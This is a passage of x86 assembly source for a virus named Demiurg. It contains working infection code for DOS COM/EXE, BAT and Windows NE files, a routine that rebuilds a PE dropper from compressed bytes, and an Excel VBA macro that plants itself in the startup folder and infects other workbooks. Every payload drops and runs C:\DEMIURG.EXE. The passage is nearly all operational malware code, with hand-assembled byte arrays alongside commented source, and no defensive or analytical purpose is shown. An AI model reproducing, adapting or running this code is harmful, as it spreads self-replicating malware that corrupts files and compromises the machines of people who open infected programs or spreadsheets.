JNE cmp_loop ; if not, go on with compare
|
|||
|
JMP found_API ; if yes, we found our API!
|
|||
|
|
|||
|
search_on_API:
|
|||
|
popa ; restore all registers
|
|||
|
inc ecx ; try the next exported API
|
|||
|
cmp ecx, edx ; end of exported APIs?
|
|||
|
JL search_loop ; if yes, try the next one
|
|||
|
|
|||
|
API_not_found:
|
|||
|
popa ; restore all regisers
|
|||
|
stc ; indicate error with carry
|
|||
|
RET
|
|||
|
|
|||
|
found_API:
|
|||
|
popa ; restore all registers
|
|||
|
mov edx, [ebx+24h] ; EDX=AddressOfOrdinals RVA
|
|||
|
add edx, eax ; EDX=AddressOfOrdinals VA
|
|||
|
movzx ecx, word ptr [edx+ecx*2] ; ECX=our API's ordinal
|
|||
|
mov edx, [ebx+1Ch] ; EDX=AddressOfFunctions RVA
|
|||
|
lea edx, [edx+ecx*4] ; EDX=RVA of RVA of API
|
|||
|
clc ; successful, clear carry
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- aligns ECX to EDX ---------------------------------------------------
|
|||
|
align_ECX:
|
|||
|
push ebx ; save EBX
|
|||
|
xchg eax, ecx ; EAX=value to be aligned
|
|||
|
mov ebx, edx ; EBX=alignment factor
|
|||
|
xor edx, edx ; zero out high dword
|
|||
|
div ebx ; divide
|
|||
|
or edx, edx ; remainer zero?
|
|||
|
JZ no_round_up ; if so, don't round up
|
|||
|
inc eax ; round up
|
|||
|
no_round_up:
|
|||
|
mul ebx ; multiply again
|
|||
|
xchg eax, ecx ; ECX=aligned value
|
|||
|
mov edx, ebx ; EDX=alignment factor
|
|||
|
pop ebx ; restore EBX
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- DECOMPRESS ----------------------------------------------------------
|
|||
|
; ESI : Source buffer offset
|
|||
|
; EDI : Destination buffer offset
|
|||
|
; EBX : size compressed data
|
|||
|
|
|||
|
decompress:
|
|||
|
add ebx, esi ; EBX=pointer to end of
|
|||
|
; compressed data
|
|||
|
cld ; clear direction flag
|
|||
|
|
|||
|
loop_head:
|
|||
|
lodsb ; get a byte from compr. data
|
|||
|
cmp al, '<27>' ; is it our special byte?
|
|||
|
JNE store ; if not, just treat it normal
|
|||
|
xor eax, eax ; EAX=0
|
|||
|
lodsb ; EAX=number of repetitions
|
|||
|
xchg eax, ecx ; ECX=number of repetitions
|
|||
|
lodsb ; AL=byte to store repetively
|
|||
|
rep stosb ; store the byte repetively
|
|||
|
JMP go_on ; go on with the next byte
|
|||
|
store:
|
|||
|
stosb ; simply store the byte
|
|||
|
go_on:
|
|||
|
cmp ebx, esi ; reached the end?
|
|||
|
JA loop_head ; if not, just decompress on
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- CREATES THE PE DROPPER ----------------------------------------------
|
|||
|
; input:
|
|||
|
; EDI-where to put the dropper
|
|||
|
|
|||
|
create_dropper:
|
|||
|
pusha ; save all registers
|
|||
|
|
|||
|
mov dword ptr [ebp+orig_eip], 401060h ; set EntryRVA for dummy PE
|
|||
|
mov dword ptr [ebp+imagebase], 400000h ; set ImageBase for dummy PE
|
|||
|
|
|||
|
mov ebx, dummy_PE_size ; EBX=size of dummy PE file
|
|||
|
lea esi, [ebp+offset dummy_PE] ; ESI=pointer to compressed
|
|||
|
; PE file dropper
|
|||
|
call decompress ; decompress it
|
|||
|
|
|||
|
lea esi, [ebp+start] ; ESI=start of virus body
|
|||
|
mov ecx, virus_size ; ECX=size of virus body
|
|||
|
cld ; clear direction flag
|
|||
|
rep movsb ; copy virus body
|
|||
|
|
|||
|
popa ; restore all registers
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- compressed new header for COM->EXE conversion -----------------------
|
|||
|
new_mz_header:
|
|||
|
db 04Dh, 05Ah, 0E6h, 006h, 000h, 002h, 000h, 001h
|
|||
|
db 000h, 0FFh, 0FFh, 0F0h, 0FFh, 0FEh, 0FFh, 000h
|
|||
|
db 000h, 000h, 001h, 0F0h, 0FFh, 0E6h, 008h, 000h
|
|||
|
|
|||
|
new_mz_header_size EQU ($ - new_mz_header)
|
|||
|
|
|||
|
|
|||
|
; ----- code that will be added to dos exe/com files ------------------------
|
|||
|
;
|
|||
|
; .286
|
|||
|
; .model tiny
|
|||
|
; .code
|
|||
|
; org 100h
|
|||
|
; start:
|
|||
|
; pusha ; save all registers
|
|||
|
; push ds ; save segment registers
|
|||
|
; push es
|
|||
|
;
|
|||
|
; call next ; get delta offset
|
|||
|
; next:
|
|||
|
; pop bp
|
|||
|
; sub bp, offset next
|
|||
|
;
|
|||
|
; mov ax, ds ; AX=PSP segment
|
|||
|
; dec ax ; AX=MCB segment
|
|||
|
; mov ds, ax ; DS=MCB segment
|
|||
|
; mov bx, ds:[3] ; BX=MCB size (in paragraphs)
|
|||
|
; sub bx, 0E00h ; shrink MCB for 0E00h bytes
|
|||
|
;
|
|||
|
; mov ah, 4Ah ; resize MCB in ES to BX paragraphs
|
|||
|
; int 21h ; we need to free RAM if we want to
|
|||
|
; ; execute another program, even if
|
|||
|
; ; it is for Windows
|
|||
|
;
|
|||
|
; push cs ; DS=CS
|
|||
|
; pop ds
|
|||
|
;
|
|||
|
; mov ax, es ; AX=ES=PSP segment
|
|||
|
; mov [bp+offset segm], ax ; save in data block
|
|||
|
;
|
|||
|
; push cs ; ES=CS
|
|||
|
; pop es
|
|||
|
;
|
|||
|
; mov ah, 3Ch ; create file
|
|||
|
; xor cx, cx ; CX=0 (attribtes for new file)
|
|||
|
; lea dx, [bp+offset filename] ; DS:DX=pointer to filename
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; xchg bx, ax ; handle to BX
|
|||
|
;
|
|||
|
; mov ah, 40h ; write to file
|
|||
|
; mov cx, dropper_size ; write the whole dropper
|
|||
|
; lea dx, [bp+offset dropper] ; DS:DX=pointer to write buffer
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov ah, 3Eh ; close file
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; execute:
|
|||
|
; mov ax, 4B00h ; execute file
|
|||
|
; lea bx, [bp+offset parameter] ; ES:BX=pointer to parameter block
|
|||
|
; lea dx, [bp+offset filename] ; DS:DX=pointer to filename
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; pop es ; restore segment registers
|
|||
|
; pop ds
|
|||
|
;
|
|||
|
; mov ax, es ; AX=PSP segment
|
|||
|
; add ax, 10h ; AX=start segment of program image
|
|||
|
; add [bp+relo_CS], ax ; relocate old segment values
|
|||
|
; add [bp+relo_SS], ax
|
|||
|
;
|
|||
|
; popa ; restore all registers
|
|||
|
;
|
|||
|
; db 68h ; push imm16
|
|||
|
; relo_SS dw ?
|
|||
|
;
|
|||
|
; cli
|
|||
|
; pop ss ; set host SS
|
|||
|
; db 0BCh ; mov sp, imm16
|
|||
|
; SP_start dw ?
|
|||
|
; sti
|
|||
|
;
|
|||
|
; db 0EAh ; jmp far imm32
|
|||
|
; IP_start dw ?
|
|||
|
; relo_CS dw ?
|
|||
|
;
|
|||
|
;
|
|||
|
; filename db "C:\DEMIURG.EXE", 0
|
|||
|
;
|
|||
|
; parameter:
|
|||
|
; dw 0 ; same enviroment as caller
|
|||
|
; dw 80h
|
|||
|
; segm dw 0
|
|||
|
; dw 4 dup(0FFFFh) ; FCB addresses (nothing)
|
|||
|
;
|
|||
|
; dropper:
|
|||
|
;
|
|||
|
; end start
|
|||
|
|
|||
|
dos_virus_code:
|
|||
|
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Dh, 081h
|
|||
|
db 0EDh, 006h, 001h, 08Ch, 0D8h, 048h, 08Eh, 0D8h
|
|||
|
db 08Bh, 01Eh, 003h, 000h, 081h, 0EBh, 000h, 00Eh
|
|||
|
db 0B4h, 04Ah, 0CDh, 021h, 00Eh, 01Fh, 08Ch, 0C0h
|
|||
|
db 089h, 086h, 07Eh, 001h, 00Eh, 007h, 0B4h, 03Ch
|
|||
|
db 033h, 0C9h, 08Dh, 096h, 06Bh, 001h, 0CDh, 021h
|
|||
|
db 093h, 0B4h, 040h, 0B9h
|
|||
|
dw dropper_size
|
|||
|
db 08Dh, 096h
|
|||
|
db 088h, 001h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h
|
|||
|
db 0B8h, 000h, 04Bh, 08Dh, 09Eh, 07Ah, 001h, 08Dh
|
|||
|
db 096h, 06Bh, 001h, 0CDh, 021h, 007h, 01Fh, 08Ch
|
|||
|
db 0C0h, 005h, 010h, 000h, 001h, 086h, 069h, 001h
|
|||
|
db 001h, 086h, 05Eh, 001h, 061h, 068h
|
|||
|
relo_SS dw ?
|
|||
|
db 0FAh, 017h, 0BCh
|
|||
|
SP_start dw ?
|
|||
|
db 0FBh, 0EAh
|
|||
|
IP_start dw ?
|
|||
|
relo_CS dw ?
|
|||
|
db 043h, 03Ah, 05Ch, 044h, 045h
|
|||
|
db 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h, 058h
|
|||
|
db 045h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
|
|||
|
db 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh
|
|||
|
size_dos_virus_code EQU ($ - dos_virus_code)
|
|||
|
|
|||
|
|
|||
|
; ----- code that will be added to BAT files --------------------------------
|
|||
|
;
|
|||
|
; This is the BAT code that is appended at the end of infected BAT files. As
|
|||
|
; you see, it ECHOes out a COM file and executes it. Then the COM file reads
|
|||
|
; the PE dropper that is stored as a kind of internal overlay at the end of
|
|||
|
; the BAT file, writes it to disk and executes it. Here is the ASM source of
|
|||
|
; the COM loader first:
|
|||
|
;
|
|||
|
; .286
|
|||
|
; .model tiny
|
|||
|
; .code
|
|||
|
; org 100h
|
|||
|
; start:
|
|||
|
; mov ah, 4Ah ; resize memory block
|
|||
|
; mov bx, 2020h ; BX=new MCB size in paragraphs
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; xor bx, bx ; BX=0
|
|||
|
; mov bl, 80h ; BX=80h (command line in PSP)
|
|||
|
; mov si, bx ; SI=BX
|
|||
|
; mov bl, [si] ; BX=length of commandline
|
|||
|
; mov [si+bx+1], bh ; make command line zero terminated
|
|||
|
;
|
|||
|
; mov ax, 3D02h ; open file read/write
|
|||
|
; lea dx, [si+2] ; DS:DX=pointer to filename(cmdline)
|
|||
|
; int 21h
|
|||
|
; JNC file_ok
|
|||
|
; RET ; quit com file
|
|||
|
;
|
|||
|
; file_ok:
|
|||
|
; xchg bx, ax ; handle to BX
|
|||
|
;
|
|||
|
; mov ax, 4202h ; set filepointer relative to EOF
|
|||
|
; xor cx, cx ; CX=0
|
|||
|
; dec cx ; CX=-1
|
|||
|
; mov dx, ((-dropper_size)-1) ; otherwise we would have a zerobyte
|
|||
|
; ; in the COM file
|
|||
|
; inc dx ; CX:DX=-dropper_size
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov ah, 3Fh ; read from file
|
|||
|
; mov cx, dropper_size - 1 ; read the whole PE dropper
|
|||
|
; inc cx
|
|||
|
; mov dx, offset buffer ; DS:DX=offset to read buffer
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov ah, not 3Eh ; close file
|
|||
|
; not ax
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov ah, not 3Ch ; create file
|
|||
|
; not ax
|
|||
|
; xor cx, cx ; CX=0 (file attributes)
|
|||
|
; mov zero, cl ; make filename zero terminated
|
|||
|
; mov dx, offset exefile ; DS:DX=pointer to filename
|
|||
|
; int 21h
|
|||
|
; JC quit
|
|||
|
;
|
|||
|
; xchg bx, ax ; handle to BX
|
|||
|
;
|
|||
|
; mov ah, 40h ; write to file
|
|||
|
; mov cx, dropper_size - 1 ; CX=size to write (whole PE drpper)
|
|||
|
; inc cx
|
|||
|
; mov dx, offset buffer ; DS:DX=pointer to write buffer
|
|||
|
; int 21h
|
|||
|
; JC quit
|
|||
|
;
|
|||
|
; mov ah, not 3Eh ; close file
|
|||
|
; not ax
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; xor ax, ax ; AX=0
|
|||
|
; mov ah, 4Bh ; AX=4B00h
|
|||
|
; xor bx, bx ; BX=0 (no parameter block)
|
|||
|
; mov dx, offset exefile ; DS:DX=pointer to filename
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; quit:
|
|||
|
; mov ah, 4Ch ; quit program
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; exefile db "C:\demiurg.exe"
|
|||
|
; zero db ?
|
|||
|
; buffer:
|
|||
|
;
|
|||
|
; end start
|
|||
|
|
|||
|
bat_virus_code:
|
|||
|
db "@echo off", 0Dh, 0Ah
|
|||
|
db "set overlay=%0", 0Dh, 0Ah
|
|||
|
db "if not exist %overlay% set overlay=%0.BAT", 0Dh, 0Ah
|
|||
|
db "echo "
|
|||
|
|
|||
|
db 0B4h, 04Ah, 0BBh, 020h, 020h, 0CDh, 021h, 033h
|
|||
|
db 0DBh, 0B3h, 080h, 08Bh, 0F3h, 08Ah, 01Ch, 088h
|
|||
|
db 078h, 001h, 0B8h, 002h, 03Dh, 08Dh, 054h, 002h
|
|||
|
db 0CDh, 021h, 073h, 001h, 0C3h, 093h, 0B8h, 002h
|
|||
|
db 042h, 033h, 0C9h, 049h, 0BAh
|
|||
|
dw ((-dropper_size) - 1)
|
|||
|
db 042h, 0CDh, 021h, 0B4h, 03Fh, 0B9h
|
|||
|
dw (dropper_size - 1)
|
|||
|
db 041h
|
|||
|
db 0BAh, 07Eh, 001h, 0CDh, 021h, 0B4h, 0C1h, 0F7h
|
|||
|
db 0D0h, 0CDh, 021h, 0B4h, 0C3h, 0F7h, 0D0h, 033h
|
|||
|
db 0C9h, 088h, 00Eh, 07Dh, 001h, 0BAh, 06Fh, 001h
|
|||
|
db 0CDh, 021h, 072h, 01Fh, 093h, 0B4h, 040h, 0B9h
|
|||
|
dw (dropper_size - 1)
|
|||
|
db 041h, 0BAh, 07Eh, 001h, 0CDh, 021h, 072h, 011h
|
|||
|
db 0B4h, 0C1h, 0F7h, 0D0h, 0CDh, 021h, 033h, 0C0h
|
|||
|
db 0B4h, 04Bh, 033h, 0DBh, 0BAh, 06Fh, 001h, 0CDh
|
|||
|
db 021h, 0B4h, 04Ch, 0CDh, 021h, 043h, 03Ah, 05Ch
|
|||
|
db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 02Eh
|
|||
|
db 065h, 078h, 065h
|
|||
|
|
|||
|
db ">C:\DEMIURG.EXE"
|
|||
|
db 0Dh, 0Ah
|
|||
|
db "C:\DEMIURG.EXE %overlay%", 0Dh, 0Ah
|
|||
|
db "set overlay=", 0Dh, 0Ah
|
|||
|
db 1Ah ; end of text file
|
|||
|
|
|||
|
size_bat_virus_code EQU ($ - bat_virus_code)
|
|||
|
|
|||
|
|
|||
|
; ------ Code that will be added to NE files --------------------------------
|
|||
|
;
|
|||
|
; .286
|
|||
|
; .model tiny
|
|||
|
; .code
|
|||
|
; org 100h
|
|||
|
; start:
|
|||
|
; pusha ; save all registers
|
|||
|
; push ds ; save segment registers
|
|||
|
; push es
|
|||
|
;
|
|||
|
; call next ; get delta offset
|
|||
|
; next:
|
|||
|
; pop si
|
|||
|
; add si, (data_block - next)
|
|||
|
;
|
|||
|
; mov ax, es ; AX=PSP segment
|
|||
|
;
|
|||
|
; push cs ; DS=CS
|
|||
|
; pop ds
|
|||
|
;
|
|||
|
; push ss ; ES=SS
|
|||
|
; pop es
|
|||
|
; cld ; clear direction flag
|
|||
|
; mov cx, data_size ; CX=size of our data
|
|||
|
; sub sp, (data_size+512) ; allocate buffer on stack
|
|||
|
; mov bp, sp ; BP=stack frame
|
|||
|
; mov di, bp ; DI=our buffer on stack
|
|||
|
; rep movsb ; copy data block to stackbuf
|
|||
|
;
|
|||
|
; push ss ; DS=ES=SS
|
|||
|
; push ss
|
|||
|
; pop es
|
|||
|
; pop ds
|
|||
|
;
|
|||
|
; mov [bp+4], ax ; set PSP segm in paramblock
|
|||
|
;
|
|||
|
; mov ax, 3D02h ; open file read/write
|
|||
|
; lea dx, [bp+our_filename-data_block] ; DS:DX=filename of our host
|
|||
|
; int 21h
|
|||
|
; JC exit
|
|||
|
;
|
|||
|
; xchg bx, ax ; handle to BX
|
|||
|
;
|
|||
|
; mov ax, 4202h ; set filepointer relative
|
|||
|
; ; to the end of the file
|
|||
|
; mov cx, -1 ; CX:DX=-dropper_size
|
|||
|
; mov dx, -dropper_size
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov [bp+source_handle-data_block], bx ; save filehandle
|
|||
|
;
|
|||
|
; mov ah, 3Ch ; create file
|
|||
|
; xor cx, cx ; CX=0 (file attributes)
|
|||
|
; lea dx, [bp+(filename-data_block)] ; DS:DX=pointer to PE dropper
|
|||
|
; ; filename ("C:\demiurg.exe")
|
|||
|
; int 21h
|
|||
|
; JC close_source
|
|||
|
;
|
|||
|
; mov [bp+dest_handle-data_block], ax ; save filehandle
|
|||
|
;
|
|||
|
; mov cx, (dropper_size / 512) ; CX=size of dropper in
|
|||
|
; ; 512 byte blocks
|
|||
|
;
|
|||
|
; rw_loop:
|
|||
|
; push cx ; save number of blocks left
|
|||
|
;
|
|||
|
; mov ah, 3Fh ; read from file
|
|||
|
; mov bx, [bp+source_handle-data_block] ; BX=source handle
|
|||
|
; mov cx, 512 ; CX=size to read
|
|||
|
; lea dx, [bp+(buffer-data_block)] ; DS:DX=pointer to read buf
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov ah, 40h ; write to file
|
|||
|
; mov bx, [bp+dest_handle-data_block] ; BX=destination handle
|
|||
|
; mov cx, 512 ; CX=size to write
|
|||
|
; lea dx, [bp+(buffer-data_block)] ; DS:DX=pointer to write buf
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; pop cx ; CX=number of blocks left
|
|||
|
; LOOP rw_loop
|
|||
|
;
|
|||
|
; mov ah, 3Eh ; close source file
|
|||
|
; mov bx, [bp+source_handle-data_block]
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov ah, 3Eh ; close destination file
|
|||
|
; mov bx, [bp+dest_handle-data_block]
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov ax, 4B00h ; execute dropper file
|
|||
|
; mov bx, bp ; ES:BX=parameter block
|
|||
|
; lea dx, [bx+18] ; DS:DX=filename
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; JMP exit
|
|||
|
;
|
|||
|
; close_source:
|
|||
|
; mov ah, 3Eh ; close file
|
|||
|
; mov bx, [bp+source_handle-data_block]
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; exit:
|
|||
|
; add sp, (data_size+512) ; remove stack buffer
|
|||
|
;
|
|||
|
; pop es ; restore segment registers
|
|||
|
; pop ds
|
|||
|
; popa ; restore all registers
|
|||
|
;
|
|||
|
; db 68h ; push imm16
|
|||
|
; NE_ip dw 0
|
|||
|
; db 0C3h ; ret near
|
|||
|
;
|
|||
|
; data_block dw 0 ; same enviroment as caller
|
|||
|
; dw 80h ; parameter string offset
|
|||
|
; segm dw 0
|
|||
|
; dw 4 dup(0)
|
|||
|
;
|
|||
|
; source_handle dw 0
|
|||
|
; dest_handle dw 0
|
|||
|
; filename db "C:\DEMIURG.EXE", 0
|
|||
|
; our_filename db 13 dup(0)
|
|||
|
; data_size = $ - data_block
|
|||
|
; buffer:
|
|||
|
;
|
|||
|
; end start
|
|||
|
|
|||
|
NE_virus_code:
|
|||
|
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Eh, 081h
|
|||
|
db 0C6h, 094h, 000h, 08Ch, 0C0h, 00Eh, 01Fh, 016h
|
|||
|
db 007h, 0FCh, 0B9h, 02Eh, 000h, 081h, 0ECh, 02Eh
|
|||
|
db 002h, 08Bh, 0ECh, 08Bh, 0FDh, 0F3h, 0A4h, 016h
|
|||
|
db 016h, 007h, 01Fh, 089h, 046h, 004h, 0B8h, 002h
|
|||
|
db 03Dh, 08Dh, 056h, 021h, 0CDh, 021h, 072h, 05Fh
|
|||
|
db 093h, 0B8h, 002h, 042h, 0B9h, 0FFh, 0FFh, 0BAh
|
|||
|
dw -dropper_size
|
|||
|
db 0CDh, 021h, 089h, 05Eh, 00Eh, 0B4h
|
|||
|
db 03Ch, 033h, 0C9h, 08Dh, 056h, 012h, 0CDh, 021h
|
|||
|
db 072h, 03Eh, 089h, 046h, 010h, 0B9h
|
|||
|
dw (dropper_size/512)
|
|||
|
db 051h, 0B4h, 03Fh, 08Bh, 05Eh, 00Eh, 0B9h, 000h
|
|||
|
db 002h, 08Dh, 056h, 02Eh, 0CDh, 021h, 0B4h, 040h
|
|||
|
db 08Bh, 05Eh, 010h, 0B9h, 000h, 002h, 08Dh, 056h
|
|||
|
db 02Eh, 0CDh, 021h, 059h, 0E2h, 0E2h, 0B4h, 03Eh
|
|||
|
db 08Bh, 05Eh, 00Eh, 0CDh, 021h, 0B4h, 03Eh, 08Bh
|
|||
|
db 05Eh, 010h, 0CDh, 021h, 0B8h, 000h, 04Bh, 08Bh
|
|||
|
db 0DDh, 08Dh, 057h, 012h, 0CDh, 021h, 0EBh, 007h
|
|||
|
db 0B4h, 03Eh, 08Bh, 05Eh, 00Eh, 0CDh, 021h, 081h
|
|||
|
db 0C4h, 02Eh, 002h, 007h, 01Fh, 061h, 068h
|
|||
|
NE_start_IP dw 0
|
|||
|
db 0C3h, 000h, 000h, 080h, 000h, 000h, 000h
|
|||
|
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
|
|||
|
db 000h, 000h, 000h, 000h, 043h, 03Ah, 05Ch, 044h
|
|||
|
db 045h, 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h
|
|||
|
db 058h, 045h, 000h
|
|||
|
our_filename db 13 dup(0)
|
|||
|
size_NE_virus_code EQU ($ - NE_virus_code)
|
|||
|
|
|||
|
|
|||
|
; ------ dropper code -------------------------------------------------------
|
|||
|
;
|
|||
|
; This is a dummy PE file that is as small as possible (under 1KB) and just
|
|||
|
; calls ExitProcess. It has been infected with the virus, then the virus body
|
|||
|
; was removed, then compressed and converted to DB instructions. This means
|
|||
|
; that all we have to do to recreate a working dropper is to expand it and
|
|||
|
; add the virus body (see procedure create_dropper)
|
|||
|
|
|||
|
dummy_PE:
|
|||
|
db 04Dh, 05Ah, 040h, 000h, 001h, 000h, 000h, 000h
|
|||
|
db 004h, 000h, 000h, 000h, 001h, 0E6h, 005h, 000h
|
|||
|
db 042h, 04Ah, 000h, 000h, 0F0h, 0FFh, 040h, 0E6h
|
|||
|
db 023h, 000h, 040h, 000h, 000h, 000h, 050h, 045h
|
|||
|
db 000h, 000h, 04Ch, 001h, 001h, 0E6h, 00Dh, 000h
|
|||
|
db 0E0h, 000h, 08Eh, 081h, 00Bh, 001h, 0E6h, 00Eh
|
|||
|
db 000h, 068h, 010h, 0E6h, 00Ch, 000h, 040h, 000h
|
|||
|
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
|
|||
|
db 001h, 0E6h, 007h, 000h, 003h, 000h, 00Ah, 0E6h
|
|||
|
db 006h, 000h, 060h, 000h, 000h, 000h, 002h, 0E6h
|
|||
|
db 006h, 000h, 002h, 0E6h, 005h, 000h, 010h, 000h
|
|||
|
db 000h, 020h, 0E6h, 004h, 000h, 010h, 000h, 000h
|
|||
|
db 010h, 0E6h, 006h, 000h, 010h, 0E6h, 00Ch, 000h
|
|||
|
db 010h, 000h, 000h, 054h, 0E6h, 073h, 000h, 02Eh
|
|||
|
db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 000h
|
|||
|
db 050h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
|
|||
|
db 042h, 000h, 000h, 000h, 002h, 0E6h, 00Eh, 000h
|
|||
|
db 060h, 000h, 000h, 0E0h, 0E6h, 0A0h, 000h, 028h
|
|||
|
db 010h, 0E6h, 00Ah, 000h, 038h, 010h, 000h, 000h
|
|||
|
db 030h, 010h, 0E6h, 016h, 000h, 046h, 010h, 0E6h
|
|||
|
db 006h, 000h, 046h, 010h, 0E6h, 006h, 000h, 04Bh
|
|||
|
db 045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh
|
|||
|
db 064h, 06Ch, 06Ch, 0E6h, 004h, 000h, 045h, 078h
|
|||
|
db 069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h
|
|||
|
db 073h, 0E6h, 00Dh, 000h, 06Ah, 000h, 0FFh, 015h
|
|||
|
db 030h, 010h, 040h, 000h
|
|||
|
dummy_PE_size EQU ($ - dummy_PE)
|
|||
|
|
|||
|
dropper_size EQU 17408
|
|||
|
|
|||
|
|
|||
|
; ----- macro dropper code --------------------------------------------------
|
|||
|
;
|
|||
|
; This is a (compressed) .xls file that will be stored in the xlstart
|
|||
|
; directory of excel. It contains the macro code that will stay resident in
|
|||
|
; Excel and infects other .xls files:
|
|||
|
;
|
|||
|
; Attribute VB_Name = "Demiurg"
|
|||
|
; Sub Auto_Open()
|
|||
|
; Application.OnSheetActivate = "Infect"
|
|||
|
; End Sub
|
|||
|
; Sub Infect()
|
|||
|
; Application.DisplayAlerts = False
|
|||
|
;
|
|||
|
; lastchar = Asc(Mid$(ActiveWorkbook.Name, Len(ActiveWorkbook.Name), 1))
|
|||
|
; If Asc("1") <= lastchar And lastchar <= Asc("9") Then Exit Sub
|
|||
|
;
|
|||
|
; For i = 1 To ActiveWorkbook.VBProject.VBComponents.count
|
|||
|
; If ActiveWorkbook.VBProject.VBComponents(i).Name = "Demiurg" Then Exit Sub
|
|||
|
; Next i
|
|||
|
;
|
|||
|
; ActiveWorkbook.VBProject.VBComponents.Import ("C:\demiurg.sys")
|
|||
|
; ActiveWorkbook.Save
|
|||
|
; End Sub
|
|||
|
|
|||
|
macro_dropper:
|
|||
|
db 0D0h, 0CFh, 011h, 0E0h, 0A1h, 0B1h, 01Ah, 0E1h
|
|||
|
db 0E6h, 010h, 000h, 03Eh, 000h, 003h, 000h, 0FEh
|
|||
|
db 0FFh, 009h, 000h, 006h, 0E6h, 00Bh, 000h, 001h
|
|||
|
db 000h, 000h, 000h, 001h, 0E6h, 008h, 000h, 010h
|
|||
|
db 000h, 000h, 002h, 000h, 000h, 000h, 002h, 000h
|
|||
|
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0E6h, 008h
|
|||
|
db 000h, 0E6h, 0FFh, 0FFh, 0E6h, 0B1h, 0FFh, 0FDh
|
|||
|
db 0FFh, 0FFh, 0FFh, 009h, 000h, 000h, 000h, 013h
|
|||
|
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 005h
|
|||
|
db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 007h
|
|||
|
db 000h, 000h, 000h, 008h, 000h, 000h, 000h, 00Ah
|
|||
|
db 000h, 000h, 000h, 019h, 000h, 000h, 000h, 00Bh
|
|||
|
db 000h, 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh
|
|||
|
db 000h, 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh
|
|||
|
db 000h, 000h, 000h, 010h, 000h, 000h, 000h, 011h
|
|||
|
db 000h, 000h, 000h, 012h, 000h, 000h, 000h, 014h
|
|||
|
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 015h
|
|||
|
db 000h, 000h, 000h, 016h, 000h, 000h, 000h, 017h
|
|||
|
db 000h, 000h, 000h, 018h, 000h, 000h, 000h, 01Ah
|
|||
|
db 000h, 000h, 000h, 01Dh, 000h, 000h, 000h, 01Bh
|
|||
|
db 000h, 000h, 000h, 01Ch, 000h, 000h, 000h, 01Eh
|
|||
|
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0FEh
|
|||
|
db 0E6h, 0FFh, 0FFh, 0E6h, 088h, 0FFh, 052h, 000h
|
|||
|
db 06Fh, 000h, 06Fh, 000h, 074h, 000h, 020h, 000h
|
|||
|
db 045h, 000h, 06Eh, 000h, 074h, 000h, 072h, 000h
|
|||
|
db 079h, 0E6h, 02Dh, 000h, 016h, 000h, 005h, 000h
|
|||
|
db 0E6h, 008h, 0FFh, 002h, 000h, 000h, 000h, 020h
|
|||
|
db 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h, 006h
|
|||
|
db 000h, 046h, 0E6h, 004h, 000h, 040h, 026h, 06Ch
|
|||
|
db 034h, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
|
|||
|
db 04Ah, 03Fh, 085h, 0BFh, 001h, 003h, 000h, 000h
|
|||
|
db 000h, 080h, 02Eh, 0E6h, 006h, 000h, 057h, 000h
|
|||
|
db 06Fh, 000h, 072h, 000h, 06Bh, 000h, 062h, 000h
|
|||
|
db 06Fh, 000h, 06Fh, 000h, 06Bh, 0E6h, 031h, 000h
|
|||
|
db 012h, 000h, 002h, 001h, 00Dh, 000h, 000h, 000h
|
|||
|
db 0E6h, 008h, 0FFh, 0E6h, 028h, 000h, 092h, 00Ah
|
|||
|
db 0E6h, 006h, 000h, 05Fh, 000h, 056h, 000h, 042h
|
|||
|
db 000h, 041h, 000h, 05Fh, 000h, 050h, 000h, 052h
|
|||
|
db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h
|
|||
|
db 000h, 054h, 000h, 05Fh, 000h, 043h, 000h, 055h
|
|||
|
db 000h, 052h, 0E6h, 021h, 000h, 022h, 000h, 001h
|
|||
|
db 001h, 001h, 000h, 000h, 000h, 00Bh, 000h, 000h
|
|||
|
db 000h, 00Ah, 0E6h, 017h, 000h, 0A0h, 03Ch, 035h
|
|||
|
db 04Ah, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
|
|||
|
